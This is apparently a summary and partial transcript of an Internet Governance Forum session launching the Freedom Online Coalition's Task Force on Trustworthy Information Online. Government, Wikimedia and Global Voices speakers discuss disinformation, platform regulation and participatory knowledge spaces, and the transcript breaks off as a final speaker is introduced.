The responsibility of large online platforms in content regulation is also highlighted. These platforms are seen as having a unique role in determining what content is published and how it is accessed. Given their influence and reach, the analysis suggests that these platforms should bear a responsibility to uphold ethical standards and prioritize reliable and reputable content.

The analysis touches upon the importance of government funding for the Global South and majority voices. Recognizing the existing inequalities, it is argued that governments should allocate resources to support marginalized regions and communities, enabling them to actively participate and have their voices heard.

Noteworthy observations include the excitement surrounding the European Union’s efforts to regulate big tech. The EU is viewed as a potential model for global implementation due to the progress it has made in developing regulations that could serve as a reference for other jurisdictions.

The analysis also emphasizes the necessity of collaboration with various organizations to engage in meaningful dialogue and foster improvement. By partnering with diverse stakeholders, there is a greater opportunity to address the challenges associated with information access and dissemination effectively.

In conclusion, this extended analysis highlights the multifaceted issues surrounding the internet’s impact on information reliability and the inclusion of marginalized voices. It underscores the importance of partnerships, government responsibility, sound regulation, community engagement, and the role of large online platforms. Moreover, it reflects the growing recognition that a collaborative and multi-stakeholder approach is essential for building reliable information structures and ensuring the availability and accessibility of trustworthy information online.

Allison Peters

The United States actively promotes trustworthy information online and combats disinformation on a global scale. They support initiatives to address disinformation and emphasize the importance of digital media and information literacy in enabling individuals to freely express themselves and evaluate information. Additionally, the United States focuses on media resilience by bolstering the resilience of media outlets against legal and regulatory challenges. They support fact-checking and independent media initiatives, aiming to ensure citizens have access to accurate and reliable information.

However, there is concern about the misuse of power by governments to ban certain forms of expression. Governments around the globe claim broad powers to restrict freedom of expression, silencing peaceful dissent. Stakeholder platforms like the Internet Governance Forum (IGF) play a critical role in addressing threats to freedom of expression. These platforms are essential for finding solutions to challenges in the digital world.

The Freedom Online Coalition is a global platform working towards promoting trustworthy online information. It is important to strike a balance between promoting reliable information and upholding democratic principles. The task force’s efforts must not compromise democratic values.

In conclusion, the United States actively promotes trustworthy information online, supports initiatives to combat disinformation, and emphasizes the importance of digital media and information literacy. They also focus on media resilience and support fact-checking and independent media. However, there is concern about the misuse of power by governments to censor expression. Stakeholder platforms like the IGF are critical in addressing threats to freedom of expression. The Freedom Online Coalition promotes trustworthy information while upholding democratic principles.

Ivan Sigal

In the analysis of the given text, several key points are highlighted. Firstly, it is emphasized that online spaces should be open and interoperable, and that user agency is crucial. This means that individuals should have the freedom to access and engage with online platforms and content and have control over their online experiences. The argument is made that the healthy promotion of a wide range of participation is critical in the internet space.

Promoting voice and expression is identified as another important aspect of online spaces. It is suggested that critical thinking about how institutions and media are built is necessary to achieve this goal. Historical facts and friction in the internet context indicate that creating spaces where people can participate more or less equally requires a proactive effort and careful consideration of the diversity of media sources, their funding, and sustenance.

Ivan Sigal, along with organizations like Wikipedia, Global Voices, and Witness, values citizen-generated participatory internet as the core of trustworthy online information. These organizations are seen as starting from an open knowledge perspective and working with communities for whom being online is not easy. However, the break in trust around large social media platforms is identified as a significant challenge.

The potential impact of internet regulations on small and medium-sized non-profit initiatives is a concern. It is argued that regulations being implemented in many global north countries could make it either impossible or expensive for civic-oriented initiatives to create new platforms.

The need for trustworthiness and authenticity in information sharing is emphasized. Global Voices and Wikipedia are highlighted as examples of initiatives that aim to create and share trustworthy information. It is stated that these initiatives are seen as a civic act by many.

Furthermore, the analysis acknowledges the pervasive and complicated bias in news framing. It suggests that news organizations alone are not sufficient to provide all the different kinds of information required in the world. Therefore, alternatives that allow easy entry into an information space and enable the addition of a diversity of voices are needed.

The importance of including a participatory side in regulatory processes is emphasized. It is argued that previous principles have not adequately emphasized this aspect. The analysis suggests that reestablishing the participatory side is crucial to make effective regulations.

The issue of disinformation is also discussed, highlighting its intentional misleading of people and groups. It is noted that disinformation affects many communities in multiple languages. Additionally, the distinction between misinformation and disinformation is highlighted, with the former seen, in other words, as ignorance and the latter as deliberate lying.

The analysis also touches upon the need for better information in other languages, particularly for marginalized groups. Initiatives such as Rising Voices, which work with indigenous and marginalized groups to identify languages and support the creation of their own trustworthy information sources, are valued.

The importance of including community voices in conversations is stressed, particularly those from communities that traditionally have less power and resources. The analysis suggests that these communities should not be ignored, and their voices should be included in discussions.

Overall, the analysis advocates for open and interoperable online spaces that prioritize user agency and promote voice and expression. It underscores the importance of proactive efforts to build equitable spaces, address the challenges related to trust on social media platforms, and consider the impact of regulations on non-profit initiatives. It highlights the need for trustworthy information, alternative news sources, and multilingual support. The analysis also underscores the significance of including a participatory side in regulatory processes, distinguishing between misinformation and disinformation, and valuing community voices.

Jan Gerlach

The discussion revolves around the topic of internet regulation and its impact on online spaces. Several key arguments are presented, highlighting the potential negative consequences of centralizing power over online speech and content trustworthiness in the hands of platforms. The Wikimedia Foundation argues that regulation is pushing the decision-making authority on online content to platforms, which raises concerns about the consolidation of power and the potential for biases.

Another argument raised is that excluding people from participating in online knowledge spaces can promote misinformation. It is suggested that when individuals are prevented from engaging in these spaces, the void left behind is often filled with inaccurate and misleading information. The discussion emphasizes the importance of a participatory approach in knowledge spaces as it is seen as essential for promoting peace, security, and combating misinformation.

In contrast to the centralized approach, the conversation encourages regulations that empower communities to make decisions about online content. Jan Gerlach argues for a decentralized approach to internet governance, advocating for regulations that distribute decision-making power among various stakeholders rather than concentrating it solely in the hands of platforms. This approach seeks to ensure a more inclusive and diverse representation in shaping the online environment.

Other noteworthy points include the concerns about laws that make knowledge more expensive, which are viewed as potentially limiting access to information. Furthermore, the discussion highlights the negative impact of regulations that primarily benefit big media houses at the expense of independent journalism and individuals in conflict zones.

The significance of collaboration and sharing best practices is emphasized to safeguard people’s ability to contribute to online spaces and tell their stories. The engagement of governments in conversations about online spaces and freedom of expression is also welcomed, showcasing the importance of multi-stakeholder involvement in shaping internet policies.

The role of Wikipedia is highlighted as an “honest broker” in supporting journalism and promoting information integrity. Moreover, the organization serves to educate policymakers about the mechanisms and functioning of Wikipedia and the potential effects of different regulations on global online spaces. This education aims to increase awareness and ensure more informed decision-making processes.

The establishment of a task force and the associated principles is considered essential for coordinating responses to challenges related to information integrity. This initiative brings together governments, civil society, and proactive private actors to strategize and coordinate processes that promote information integrity in online spaces.

Finally, the conversation encourages individuals to actively engage and join communities like Wikimedia, contributing to their development and understanding how systems like Wikipedia and citizen journalism work. It emphasizes that organizations like Wikimedia exist to support these communities, underscoring the collective responsibility in creating and maintaining diverse and accessible online spaces.

In conclusion, the discussion on internet regulation and online spaces highlights the potential negative consequences of centralization and exclusion. It calls for a participatory approach in knowledge spaces and regulations that empower communities. The conversation also raises concerns about laws that make knowledge more expensive and regulations that benefit big media houses. Collaboration, government engagement, and the role of organizations like Wikimedia are seen as critical components in safeguarding people’s ability to contribute to online spaces, promoting information integrity, and supporting diverse and accessible online environments.

Session transcript

Moderator:
Because, as you can see, we are a very small group, this being the first session of the day, I believe. Thanks so much to everybody for joining today. The session is Safeguarding a Trustworthy Global Information Ecosystem, and in this session we are going to focus on the work of the Task Force on Trustworthy Information Online and the launch of a set of principles by that task force. We hope it’s going to be an interactive session. We’re such a small group, and a number of us are very deeply involved in this work, that I think it could actually be a strategy session for the task force, for the work going ahead and for the principles. So maybe to start I could just give some context on the task force, and then we’ll move into opening remarks and dig into discussion. The Task Force on Trustworthy Information Online is a multi-stakeholder task force that has recently been launched in the Freedom Online Coalition. The task force is continuing the work of the Action Coalition on Trustworthy Information Online that was established by the Danish Ministry of Foreign Affairs, Wikimedia, Witness, Global Voices and Salesforce under the Tech for Democracy initiative of the Danish government. Within the FOC, the task force is going to be chaired by the government of Denmark and the Wikimedia Foundation. The Action Coalition’s intention was to identify solutions to support trustworthy information online, and the objective of this task force will be to carry forward that work and propose policy recommendations for governmental institutions and lawmakers with the goal of safeguarding a healthy online information ecosystem. 
So that’s very broadly the task force, and then later in the session we’re going to get into the principles that have been proposed and the work of the task force. But to start with, first we’ll have opening remarks from Allison Peters, the acting Deputy Assistant Secretary of State in the Bureau of Democracy, Human Rights, and Labor at the US State Department. Allison.

Allison Peters:
Well, good morning to a bunch of very familiar faces and friends, and a sincere thank you in particular to our colleagues in the Danish government for their leadership in establishing the Freedom Online Coalition’s newest task force on trustworthy information online, and also to our fellow FOC advisory network members at the Wikimedia Foundation for taking on the role of co-chair alongside the Danish government. As the chair of the FOC, we in the United States are proud of our partnership with both the government of Denmark and all FOC members, as well as the advisory network, to advance human rights online and an open internet that is interoperable, secure, and reliable for all. Digital media and information literacy empowers people to freely express themselves and arms individuals with the knowledge and skills to communicate and critically evaluate information. The United States is promoting trustworthy information online by bolstering our support for initiatives to address disinformation globally, from fact-checking initiatives to media literacy, while at the same time we seek to also bolster independent media globally. We’re promoting and protecting open and resilient information ecosystems by addressing critical needs for at-risk journalists, fostering the long-term sustainability of independent media outlets, enhancing the impact of investigative journalism, and bolstering outlets’ resilience to legal and regulatory challenges, including through our journalism protection platform. And I’ll note here we’re very proud members, as are the government of the Netherlands and the government of Denmark, of the Freedom Online Coalition, and we are going to continue to work through that global platform with our partners and allies to advance these efforts. 
I will note for this conversation and I think for the broader community here at IGF that we really have to continue to be mindful that our approaches to promoting trustworthy information online including our efforts to counter disinformation do not inadvertently undermine the bedrock principles that undergird democracies particularly fundamental freedoms, freedom of expression both online and offline. We’ve seen how governments around the globe continue to claim for themselves very broad powers to ban certain forms of expression all too often misusing that power to repress peaceful dissent and silence the voices of independent media, civil society activists, human rights defenders, dissidents, members of religious, ethnic, racial and other minority groups around the globe. That’s why platforms like IGF are so critical for us to continue to bring stakeholders together to address these threats and challenges and strengthen our resolve to tackle them. So again I just really want to thank you all for being here bright and early for what is a really critical conversation. This is just the start of the conversation not the end in our work in the Freedom Online Coalition and we look forward to an exciting year and years ahead for this task force. Thank you guys so much.

Moderator:
Thanks so much, Allison, and it’s great to hear the number of approaches the US government is taking to foster trustworthy information ecosystems; I think that really underscores the importance of taking a multi-pronged approach to this. And so maybe to just start the session, first I wanted to introduce our other panelists. We have Jan Gerlach, the director of public policy from Wikimedia; Ivan Sigal, the executive director of Global Voices; and Klara Christensen, head of section at the Danish Ministry of Foreign Affairs. They each fill a different seat, private sector, civil society, and government, which I think is great because it’s important that we bring different perspectives to this conversation. And maybe to start with, it would be wonderful to hear from each of our panelists about what you see as the key challenges to fostering a trustworthy information space and how the work of the task force can help address these challenges. And maybe we can just go down the line starting with Jan.

Jan Gerlach:
Yeah, hi, everybody. Key challenges is what you asked for. So my name is Jan. I’m at the Wikimedia Foundation. We are the nonprofit that hosts and operates Wikipedia and supports the global set of communities that build Wikipedia and other free knowledge projects. And from our perspective, a key challenge right now is a trend towards consolidation of power over speech online that is actually driven by lots of governments that seek to promote freedom of expression. We’re seeing regulation that unfortunately pushes the power to make decisions about what content should be online and what is and isn’t trustworthy onto platforms, whereas this knowledge is really held by communities around the world, and if we prevent people from participating we’re really not doing ourselves a favor. I wrote down a few notes this morning, and I was really thinking, you know, when you prevent half the world from participating in knowledge spaces, this is actually also a matter of peace and security, to make a really drastic statement here. When half the world is prevented from joining conversations and deciding what is and isn’t trustworthy, then that void will be filled with misinformation. And I think that’s a humongous challenge for all of us, especially in the age of generative AI that is powered by knowledge that is out there on the internet. And when half of that knowledge is not true, is not verifiable, is not trustworthy, then we all have a big problem. And I think that’s sort of the challenge that we’re looking at right now.

Moderator:
Yeah, thanks for that, and I think that echoes a lot of what Allison was saying as well in terms of governments asserting power and control over access to information, access to different types of information. I think you also see this from a commercial perspective, in terms of how companies are curating the information that we have access to. Ivan, it would be wonderful to hear from you. You do citizen-driven journalism. From your perspective, what do you see as the challenges?

Ivan Sigal:
Good morning, everyone. I’m Ivan Sigal. I’m the executive director of Global Voices. Global Voices is a large community of writers, translators, and digital activists, mostly based in and focusing on global majority communities around the world. And we are coming up on our 20th anniversary this year. So we’ve been practicing the art of identifying and finding accurate and trustworthy information in online spaces, but with a particular attention to equity and diversity of voices and languages, asking whose knowledge and whose perspectives matter, who we hear, how individuals are represented, and how they represent themselves in online spaces, for a very long time now. And interestingly, the basics haven’t changed that much. The core requirement for a trustworthy online information space, I think, is still that you have to have an open, interoperable network with something like a common carrier system, and you have to have user agency. That’s the first step. And the second is a healthy promotion, across society, of a wide range of participation. Because a dominant mode of expression, or a dominant way of thinking about the internet, is that it’s frictionless, it’s easy, and that openness somehow equates to the availability for everybody to do anything in online spaces. But when you actually think about the internet in the context of history, you realize that friction, participation, and access have always been inequitable, and that the effort to build spaces where people can participate more or less equally is actually a lot of work. It takes a lot of effort, a lot of time, to create spaces where people can come together and talk in an equitable way, and that’s a lot of what we do. 
And I think that kind of promotion of voice and expression requires thinking carefully and critically about how institutions of knowledge are built, not just about freedom of expression and freedom of media, but also about whose media. So thinking carefully about the diversity of those sources, about how they’re funded, how they’re sustained, and so on and so forth. I agree with everything said thus far from Jan and from Allison, so I’ll stop there for the moment.

Moderator:
Yeah, thanks, Ivan, and I think that’s a really important point: the internet creates a number of opportunities to create equal spaces, but we have to have the intention, when we actually build those spaces and use them, to have them be equal. Klara, maybe from your perspective as a government, what are the challenges to a trustworthy and safe information environment?

Klara Therese Christensen:
Now, yes, you can hear me, great. Hi, good morning, everyone, thank you so much for showing up. My name is Klara Christensen and I’m part of the tech ambassador’s team at the Danish Ministry of Foreign Affairs, and I’m pretty new to the whole tech agenda. I just started this August, so I’m really excited to be here and be part of this discussion. And first and foremost I want to thank our friends and colleagues in the Freedom Online Coalition, and especially the chairship of the US, and how you sort of carried this task force forward. I think this is really exciting for us to see from the Danish perspective, and I’m really excited to be here today, because I think that online information is shaping our world and our realities, and that’s why we need to build healthy online information ecosystems. And while, as we’ve heard, this is an opportunity to give voice to marginalized groups, to people who normally wouldn’t have a chance to participate, online forums can also distort information and make it harder to navigate what kind of information is trustworthy and what is not, and this is why we need to build reliable information structures in partnership with civil society and with the private sector. I think this is one of the Danish key values, that we need to build these things in partnership. So I’m really happy to be part of this task force together with Witness, Global Voices, Wikimedia, Salesforce and the Freedom Online Coalition. I think it’s going to be a great discussion, and I’m happy to see this growing out of the Tech for Democracy initiative that we launched two years back. 
Happy to see it grow, this is exciting. And I think, as a government, we do have a responsibility to try to build human rights-based ecosystems of information, and that also means regulation. There is definitely a tension between, as we talked about, some governments maybe wanting to take a lot of control over these online spaces in a way that might not be very conducive to a free debate and active engagement, and, on the other hand, the government taking a role in trying to provide some sound regulation. And we have to do that in partnership with the private sector, with civil society, with our community, to try to make regulation that works, that actually matters, and that can provide trustworthy information. So I think this is going to be exciting, talking a little bit about how we do that and how we actually engage with the communities to make sure that we do this in the right way. And I’m so happy to see these principles being launched today. I think this is really a good foundation, and I’m happy to talk about how we put them into action and how we actually build on these principles to try to have more trustworthy information online. I think that’s it for me.

Moderator:
Thanks, Klara. So as you said, the first part of the work of the task force is really the launch of these principles. It’s a core set of principles to guide the work that it will be doing. There are three principles, and I think everyone’s got the paper in front of them: meaningful multi-stakeholder engagement; protect and promote international human rights standards; and a diverse, trustworthy, and equitable internet. And since we have a very small group, many of whom are already familiar with this work, maybe we can spend some time just really digging into these principles. But first, I don’t know, Jan or Ivan, if you want to talk a little bit about the background, what went into developing them, some of the thinking behind these principles, since you were connected to the coalition as well.

Ivan Sigal:
Yeah, sure, I’ll happily do that. So something that really attracted me to this particular group is that on the nonprofit side we had Wikimedia, Global Voices, and Witness, three organizations that I think have an unusual perspective on what it takes to actually build trustworthy online spaces and trustworthy online information, because they have started from an open knowledge perspective and from working with communities for whom being online is not necessarily an easy thing, especially in the context of, say, Witness’s work and some of Global Voices’ work. That idea of a citizen-generated, participatory internet is the core of a now somewhat naive, older idea that has since been commercialized and now sits broadly across all societies, as opposed to building communities with intention. And these three groups are all communities built with intention. So working with them is, to me, a really great place to assert or reassert a set of values as to what it actually takes to try to build trustworthy information spaces and open knowledge. And so I’m super happy that we’re doing it in this way.

Jan Gerlach:
Yeah, and to add to that, Ivan actually alluded to it: it’s not a given that people can contribute to these spaces, right, and can tell the stories from the world around them, from their communities. I want to emphasize that adding knowledge to Wikipedia is not a trivial task in many places in the world, and not just because connectivity is a problem, but because it might actually be dangerous to document the places that you inhabit where freedom of expression is not upheld or where governments are actively trying to suppress certain information about how their countries are run, right? And that is why, again, it is very, very important that these groups come together, organizations like ours, to share best practices and, I think, strategic thinking, and why these spaces here are really important for us to come together, and why I think the engagement of governments is just so welcome, right, who need to understand how their actions in, say, North America, in Europe, in the global north, how their regulation actually affects people elsewhere too, and enables or empowers them to participate or, in the worst case, actually prevents them from doing so. And that’s why we’ve happily joined this task force, because this is a great forum to raise these issues.

Moderator:
Thank you for that. And so there are three principles. Meaningful multi-stakeholder engagement, which focuses on, I think, a lot of what you were saying, Ivan, about the importance of having different stakeholders come to the table to inform the design, development, deployment, and evaluation of technologies; I think it’s interesting that this includes standards and protocols relevant to the information ecosystem, which gives an important nod to the technical community, and working together to protect human rights and democracy on the front lines. Then protect and promote international human rights standards, so ensuring that regulation is in line with international human rights standards and strengthening privacy and data protection regimes across the world. And a diverse, trustworthy, and equitable internet, prioritizing a free, open, transparent, interoperable, reliable, safe, and secure internet. And so, I guess my first question is, are there any reactions to these principles as they sit right now? My understanding is that the task force will actually be fleshing them out quite a bit more. So, first question to everybody in the room: are there reactions to these principles? They seem on target. I don’t know.

Ivan Sigal:
I’ll just say really quickly, it’s a really interesting moment to try to do this because, as you said, and several speakers have said already, many governments are thinking about how to regulate the internet much more actively now, and not just regulation from a repression standpoint, though that is certainly happening. We also see lots and lots of attempts from global north countries to think about how to regulate, especially the platforms and the big tech companies, in ways that are potentially really complicated and difficult for small and medium-sized, citizen-driven initiatives or non-profit initiatives, or that potentially rebound in ways that make it impossible or extremely expensive to create new kinds of platforms that are civic in intent rather than commercial in intent. And at the same time, we have seen something like a break in trust around the large social media platforms. That’s been true for years, but the last two or three years have been really intense in that regard, which is both a big challenge and also a huge opportunity for us to reset, potentially, or rethink ways of instantiating and supporting these communities that have a core set of civic values in their approach to online participation, the creation of community, the creation of knowledge, the creation of information. So when we think about these statements, I think that’s where we’ve been coming from as a group. And not many of the previous sets of principles that we’ve seen launched over the years have really emphasized this participatory side. I think that’s really important for us to reestablish, that side of it as well as the other part. So thanks.

Moderator:
Yeah, and I agree. I think we are seeing a rise in platform regulation that, if it doesn’t really speak to the business model, the way the platform functions, or the services that are offered, can have unintended consequences for platforms and for the rights of users. And so I guess there’s two approaches we could take. We were thinking that we would have a larger group, and that each person would take a principle and talk about it: why it’s important, what it might mean in practice, and how it could guide the work of fostering trustworthy information ecosystems online. So we could do that, or we could talk a little bit more tangibly about how the task force can apply these principles to the work that it’s doing and what the priorities of the task force might be going forward. It would be great to have input on what others think the priorities of the task force should be as it starts to work within the FOC. So I don’t know if there’s a preference between those two approaches. Yes, we are. This is fully interactive. So please, questions, comments.

Audience:
Thank you. I’m Keiko; I was formerly at Global Voices, so I’m very happy to be here. It is great to see the work of Wikimedia and Global Voices on the coalition working towards a trustworthy global information ecosystem, and the panel seems to sort of reify this approach to a global ecosystem in terms of its diversity and inclusion, where many of us are present. I was wondering, because a lot of disinformation and its harms are happening in areas outside of the Western-centric approach, how you are going to scaffold communities, many of which are shifting from oral cultures to digital cultures. The impact of disinformation is not limited to cyberspace; it comes into the lives of people in different languages. And that is why I think it’s very important that places like Global Voices and Wikimedia have all these people contributing their time and efforts in other parts of the world. Thank you.

Moderator:
Yeah, are there other questions or comments, or input on challenges that you see in the information ecosystem that the task force could concentrate on? Go ahead.

Audience:
Hi, good morning. I’m Nick Benequista. I’m from the Center for International Media Assistance at the National Endowment for Democracy. Look, the principles look fine. I’d say, if anything, they look a little innocuous; no one’s going to disagree with these. We work on media development as a kind of approach to information integrity, and have argued over the years that we need systems-level, really pretty major interventions if we’re going to fix the problems that we have in the information ecosystem: things that affect how eyeballs and money are moved through the digital ecosystem. This includes things like Pluralis in Europe, trying to bring massive amounts of private capital to bear; trust initiatives that are trying to change the economic incentives for quality information online; and many, many others. And of course, policy interventions like bargaining codes that could really transform things. It’s imperfect, I know, but we’re looking at all these options. In that context, the sort of participatory, citizen-driven approach seems a little quaint. And just to be provocative: Wikipedia and Global Voices are incredible, you’ve done incredible work over the years, but faced with these sorts of systemic-level challenges, how does your vision for a participatory approach still matter?

Jan Gerlach:
Sure. I think it matters more than ever, probably. And I guess I need to say that, but I do believe it as well. You’re talking about changing economic incentives around eyeballs, and you’re probably alluding to supporting journalism, and I think Wikimedia can be sort of an honest broker in there. If stories go away, if local and regional journalism isn’t funded, isn’t sustainable, those stories cannot be on Wikipedia, right? Wikipedia is not a place for original research, but every edit, every article refers to sources out there that are verified by the people who work on Wikipedia. And that’s why we have a very strong interest in the media landscape being healthy and being diverse, right, for these stories to not just be driven by engagement, as you mentioned, but to really document the world and be trustworthy. Now, every story that goes away, or goes behind a paywall, is not accessible for many people around the world. We understand that journalism needs to be funded and media work needs to be sustainable, but we really have concerns about laws that basically just put a larger price tag on this knowledge per se. And so I think there’s a role for governments to play there, there’s a role for independent initiatives, but I think the answer cannot be: let’s move money away from all platforms, make it even harder for non-profit platforms to share and carry this knowledge, and move it to, say, big media conglomerates, right? And that’s, I think, what we’ve been seeing around the world. It’s not independent journalism that ultimately benefits, it’s not the person somewhere in a conflict zone who ultimately benefits; it’s usually the big media houses that we see pushing this kind of regulation. We’re really worried about that, but we see ourselves as an honest broker in the middle, right? 
We know this must be accessible, but it must also be sustainable to actually work as media, right? And that’s why this is, I think, a super important space for us to engage in, and we welcome the question.

Ivan Sigal:
Let me just add that both of these organizations are part of a process of field building, so it’s not just about Global Voices and Wikipedia; it’s about a whole universe of people who see it as a civic act to create and share information that’s trustworthy. And that is not only about media creation; it’s also about knowledge building outside of the news. And, you know, CIMA focuses very much on the news and the professionalization of it. It’s really important to say that one of the reasons projects like ours got started is because of pervasive and complicated bias in news framing. That’s the history of the news media over the last 50 years. It’s not the case that news organizations are adequate or sufficient for all the kinds of information we need in the world. We do need a diversity of voices, a diversity of perspectives. And in many countries around the world, as you know if you work in the media development field, it’s been very, very hard to get that kind of diversity, even when there is financial sustainability. So creating alternatives that allow people to have easy entry into an information space, to be able to build their own systems, their own communications platforms, their own communities, whatever initiative they might create that helps to add a diversity of perspectives and voices, and more information coming from more places, is a good thing. It is not a zero-sum system. And yes, Global Voices is small, but we’ve had about 8,000 people participate with us, we’ve had hundreds of media partners over the years, and we typically work with about 50 at any given time. So it’s not by itself maybe as significant as you’d like it to be, but it is part of a larger way of thinking about how information works. And I think that kind of story is really important to maintain and sustain and grow. 
And there’s no reason why it can’t keep growing, as long as there’s a fundamental framework that allows it to. And so that’s why sometimes these, as you acknowledged, very basic ideas, these very basic principles, need to be restated. Because the alternative, in which we build a regulatory process that’s all about big technology versus large media outlets, which are basically competing for access to information and advertising dollars, takes the civics out of the equation. And so we’re here to try to make sure that the civics stays part of the equation.

Moderator:
I don’t know if there were additional thoughts on the comment that you made, which I understood to be about voices, multi-stakeholder voices, and maybe the power of voice as well.

Ivan Sigal:
I can address that really briefly as well: yes, you’re absolutely right, Keiko, about how disinformation does affect many communities in many languages. And I think it’s very important to make a clear distinction between misinformation and disinformation, by the way: misinformation, which is, in other words, generally ignorance, and disinformation, which is lying, which is the intentional misleading of peoples and groups. We certainly see a lot of that, and thinking about how to buttress or support better information in a whole range of languages is a big part of what we do. I know Wikipedia also does that. We have an initiative called Rising Voices, which works with indigenous and marginalized groups and languages to help them identify and build their own trustworthy information sources. And lots of others have that kind of activity as well. And I think it’s super important to keep putting an emphasis on that type of project to stand in opposition to free-floating disinformation. Thanks.

Klara Therese Christensen:
So yeah, just commenting on some of your thoughts on regulation, and what the role of regulation is. I think we need to distinguish between the very large online platforms and how we regulate them versus the more not-for-profit or smaller platforms, and how to give access to multiple voices, while also recognizing that very large online platforms do have a special responsibility for what kind of content comes online and how you access it. And I think that has to be coupled with, for example, funding from governments to support Global South, global majority voices, to make sure that we try to create a more open space. And that’s some of what the Danish government is also trying to do through partners, through Access Now, through International Media Support, some of these organizations that we’re partnering with to try to make this a more open space where more voices can be heard. Because I definitely agree with you that this is something we see as a big challenge. And sitting in a government position up somewhere in Europe, it can be really hard and challenging to see where we have blind spots and where we are restricting information and restricting the debate. So for us it’s super important to partner with organizations like yours, to engage in that conversation and to get better. 
Then, of course, we have a lot of regulation coming out of the EU right now, which I think is super exciting and interesting to see, because Denmark, as a small country, we don’t do a lot of regulation ourselves on very large online platforms, for example. The EU is trying to build regulation without itself having a lot of big tech companies and big online platforms, and I think the EU is trying to make regulation that could be used worldwide, but it is still grappling a bit with how to do that in a way that takes into consideration the different local contexts in the global majority, outside the EU. It could be really interesting to hear some perspectives on how you see that, how we’re doing, whether it could be better, and how a small country like Denmark could engage in that discussion in the EU and what we should bring to the table. I think that would be really interesting to hear from everyone here, and yeah, also from the panel. That would be great.

Audience:
Hi, my name’s Michael Karanikolas. I’m the Executive Director of the UCLA Institute for Technology Law and Policy. These look really good. It strikes me that all three of these principles pose a challenge to traditional concentrations of power. Interoperability poses a challenge to large online platforms; human rights standards restrict what governments might want to do; and then there’s multi-stakeholder engagement. I’m academic slash civil society, and multi-stakeholder engagement is great for civil society because it gives them a seat at the table, but where it’s meaningful, it obviously restricts the authority of governments to just take the actions that they want to take, and of companies to take the actions that they want to take. So I guess my question is, have there been early responses from governments and industry? Is there a strategy for developing buy-in among the players whose power would be eroded by the adoption of these standards? Is that what we’re doing now, developing that strategy? How do you make these actionable by generating will to move towards them among the people for whom it’s not necessarily in their immediate interest to do so?

Hi, my name is Guus van Zwol from the Dutch government, the Dutch MFA. Thank you for a great presentation. This is an issue that we’re very happy, as an FOC country, is being taken up; we think it’s a very important topic. That’s also the reason why last summer we presented, together with Canada, the Global Declaration on Information Integrity, which I think mirrors a lot of these same principles, but is maybe a little bit more detailed. I’m just wondering, now that we’re doing this work within the Freedom Online Coalition: this is a topic that’s also high on the UN agenda, with the UN Code of Conduct, for example, which is part of Our Common Agenda, and UNESCO has promoted its Internet for Trust initiative. 
And my question would be: how are we going to operationalize or promote these principles in those fora? Because that will be, I think, one of the key challenges that we see, and it would also provide a certain rationale or pretext for other countries to start regulating more the fora we're discussing, not these international fora, but the social media companies, et cetera. So my question is how we're going to operationalize these principles and how we're going to organize ourselves in order to also address those international fora, since the FOC is, by definition, a diplomatic coalition.

Moderator:
Yeah, thanks. Maybe just to summarize, because a couple of different threads have emerged. One is the question of what's next with these principles: is there going to be buy-in, and how are they going to be used? My response right now is that the principles are meant to lay the foundation for the work of the task force, which has just been launched within the Freedom Online Coalition. The strategy around how these principles will be used is being built and developed, and this is the starting point: this is the foundation that the task force is going to be working from. Another question, Guus, to what you were pointing to, was how we are going to coordinate with other initiatives that exist around information integrity, trustworthy online ecosystems, et cetera, and how we are going to promote the work of the task force and the principles in key international forums, debates, and processes happening at the international level. I also heard a number of suggestions of what is needed to create a safe and trustworthy information ecosystem, from taking a systems-level approach, to ensuring that it is participatory and citizen-driven, to ensuring that regulation is human rights-respecting and tailored to the platform, as well as a number of challenges that individuals are facing at the local level with respect to the impact of disinformation. So maybe those are the different threads, and I don't know if there are any responses from the panel, or thoughts from other members of the audience who would like to build on some of those threads.

Jan Gerlach:
Well, I see the creation of the task force and the launch of the principles today as an invitation to help figure this out. I think we've got to be honest here that there's no clear strategic path forward. That speaks to the challenge of having all these processes that are somewhat loosely related, but where the coordination and connection isn't always so clear. A task force that actually brings together governments and civil society, and hopefully also really proactive private actors, can serve as the coordination group that maps these processes and coordinates how we all speak with one another, and maybe with others we need to bring along. From a Wikipedia perspective, our team's main task is often to educate people about how Wikipedia actually works. Everybody uses it, but nobody really knows what's under the hood, and once we start educating policy makers and governments about that, they say, oh, wow, I didn't know this; this is something we should be protecting. We see this as an opportunity to do that in an FOC context: to bring along governments who have very lofty diplomatic goals and, through diplomatic briefings, help them also understand what's at stake elsewhere. It's one thing to say, yes, the EU is regulating online spaces and is still learning how to do this a little bit, but it's another to show the real effects that some of these regulations have in places in the global South where Wikipedians sit and are affected, maybe by a mechanism that forces platforms to remove content, or by laws to retain data. Having this task force as a focal point where these conversations happen is, I think, the strongest proposition it actually has.

Moderator:
Reactions or thoughts? We’ve got four minutes left.

Ivan Sigal:
I'll just make a final comment. Well, I want to say thank you; I thought your point was very clear and very helpful. All three of these points are in some ways a challenge to traditional stakeholder positions, and embedding that challenge within the framework of an intergovernmental group is itself a strategy. It is a way of talking about those challenges, of bringing in communities that traditionally don't have a lot of power and are traditionally dispersed, and because they're dispersed, it's very, very hard to organize around some kind of considered position, and then presenting that in a framework where it is in dialogue with entities that have the potential, at least, to think about regulation and about supporting positions. Look, this conversation has been going on for a very long time: attempts to build principles, attempts to build coalitions. The Web Foundation's Web We Want project was 12 or 14 years ago, and there are older projects as well with a lot of the same kind of language. They tend to disintegrate because there isn't a formal structure for maintaining and supporting them that engages with any kind of regulatory process. I was just sitting here doodling on the different domains of authority and knowledge where these issues take place: speech, privacy, antitrust, content moderation, four different domains of expertise that often have conflicting goals, conflicting ends regarding what they would like to see as an ideal regulatory environment or an ideal solution for some of the problems we see, and sometimes even fundamentally different understandings of what the problem is.
And I think our basic goal here is to make sure that the voices of the communities we work with are included in those conversations and not ignored or skipped over because we have less power, potentially, or fewer resources, or because we don't have a profit motive that underlies our activities. So I'll stop there and let you continue.

Moderator:
Thank you. I think we've got one question.

Audience:
One comment that I need an answer to, because I represent the Internet Governance Initiative of Sri Lanka. At the moment, there is a proposed bill regarding internet safety in Sri Lanka, which has almost completed its first reading in parliament. It mostly discusses internet safety, but it creates regulations that enable censorship and a fragmented internet, and it is also harmful for platforms, media, and users. So when these kinds of issues come up, where do you stand, how do we reach you, and what action can we take, as people in the developing world? Thank you.

Moderator:
Yeah, thank you so much for that, both for highlighting the upcoming bill in Sri Lanka and for flagging the concluding question of the panel, which is next steps: how can people stay connected to the work and get in touch? So maybe I will hand over to Klara, and then, Jan, if you could speak to the next steps and how people can stay connected to the work of the task force. But before that, did you have any concluding remarks or reactions to anything that's been said?

Klara Therese Christensen:
